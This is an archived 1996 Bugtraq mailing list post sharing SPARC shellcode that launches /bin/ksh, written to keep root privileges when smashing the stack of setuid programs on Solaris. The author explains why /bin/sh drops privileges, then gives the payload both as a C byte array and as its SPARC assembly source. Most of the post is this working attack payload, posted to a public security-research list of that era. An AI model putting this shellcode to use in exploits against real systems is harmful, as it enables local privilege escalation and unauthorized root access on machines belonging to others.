[3731] in bugtraq
/bin/ksh sparc code
daemon@ATHENA.MIT.EDU (Kichang Yang)
Tue Dec 3 14:40:58 1996
Date: Tue, 3 Dec 1996 20:22:22 +0900
Reply-To: Kichang Yang <zomo@home.serome.co.kr>
From: Kichang Yang <zomo@home.serome.co.kr>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
It seems that "smashin' the stack" attack (the term is borrowed from
Aleph1's article) is the hottest topic of bugtraq these days.
(except symlink-to-/.rhosts attack, of course.)
If I remember correctly, the sparc code appeared on the bugtraq
is doing something like execl("/bin/sh","sh",0), and you know,
Solaris 2.4 /bin/sh does setuid(getuid()) unless "-p" isn't specified,
So it's kinda useless when it comes to attacking setuid'ed files.
So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0).
I know it's no big deal, almost close to lame, but I think it's kinda
useful. You'd like to check out Aleph1's article appeared (or will?)
on Phrack 49.
I tested it on sun4d and I'm not sure it would work on other architecture.
Bye.
-- ksh.sparc.code.c
#define SPARC_NOP 0xac15a16e
char ksh_sparc_shellcode[] =
"\x2d\x0b\xd8\x9a"
"\xac\x15\xa1\x6e"
"\x2f\x0b\xda\xdc"
"\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e"
"\x92\x03\xa0\x0c"
"\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec"
"\xc0\x23\xbf\xf4"
"\xdc\x23\xbf\xf8"
"\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b"
"\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f"
"\x82\x10\x20\x01"
"\x91\xd0\x20\x08";
-- ksh.sparc.s
.section ".data1"
.align 4
.L16:
.ascii "ksh.sparc.code goes\n\0"
.section ".text"
.global main
main:
save %sp, -96, %sp
set .L16,%o0
call printf,1
nop
sethi %hi(0x2f626800), %l6
or %l6, 0x16e, %l6
sethi %hi(0x2f6b7000), %l7
or %l7, 0x368, %l7
and %sp, %sp, %o0
add %sp, 12, %o1
xor %o2, %o2, %o2
add %sp, 20, %sp
std %l6, [%sp - 20]
st %g0, [%sp - 12]
st %sp, [%sp - 8]
st %g0, [%sp - 4]
mov 0x3b, %g1
ta 8
xor %o7, %o7, %o0
mov 1, %g1
ta 8
restore
--
